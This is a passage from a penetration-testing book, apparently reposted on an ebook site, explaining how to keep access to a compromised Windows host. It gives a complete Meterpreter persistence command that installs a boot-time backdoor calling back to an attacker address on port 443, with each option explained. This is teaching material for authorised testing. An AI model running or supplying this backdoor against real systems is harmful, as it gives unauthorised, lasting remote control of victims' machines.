Maintaining access

So far in this book, we have seen the various phases in a penetration test. All these phases require substantial time and effort. Let's assume you are conducting a penetration test on a target and have worked hard to get remote system access using Metasploit. You want to keep this hard-earned access for a few days while your assignment continues. However, there's no guarantee whether the compromised system will reboot during this period. If it reboots, your access will be lost and you may have to work again to gain the same access. This is the exact scenario where we want to maintain, or persist, access to our compromised system irrespective of whether it reboots.

Metasploit offers some excellent built-in mechanisms that can help us maintain the persistent access to the compromised system. The first step will be to use a suitable exploit available against the vulnerable target system and get Meterpreter access, as shown in the following screenshot:

Once the exploit is successful, we get Meterpreter access to the remote system. Meterpreter within Metasploit offers a utility known as persistence, which helps us install a permanent backdoor on the compromised system. We can learn more about the persistence utility with the run persistence -h command:

Now we execute the persistence command:

meterpreter >run persistence –A –L c:\ -X 60 –p 443 –r 192.168.25.130

This command will execute the persistence script and start a matching handler (-A), place the Meterpreter at c:\ on the target system (-L c:\), automatically start the listener when the system boots (-X), check every 60 seconds for a connection (60), connect on port 443 (-p 443), and connect back to us on IP address 192.168.25.130.

The output of the execution of the persistence script is as follows:

Now that the persistence script has been successfully installed on the target system, we need not worry about reboots. Even if the target system reboots, either intentionally or accidentally, the persistence script will automatically connect back to us, giving us Meterpreter access again.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.220.160.216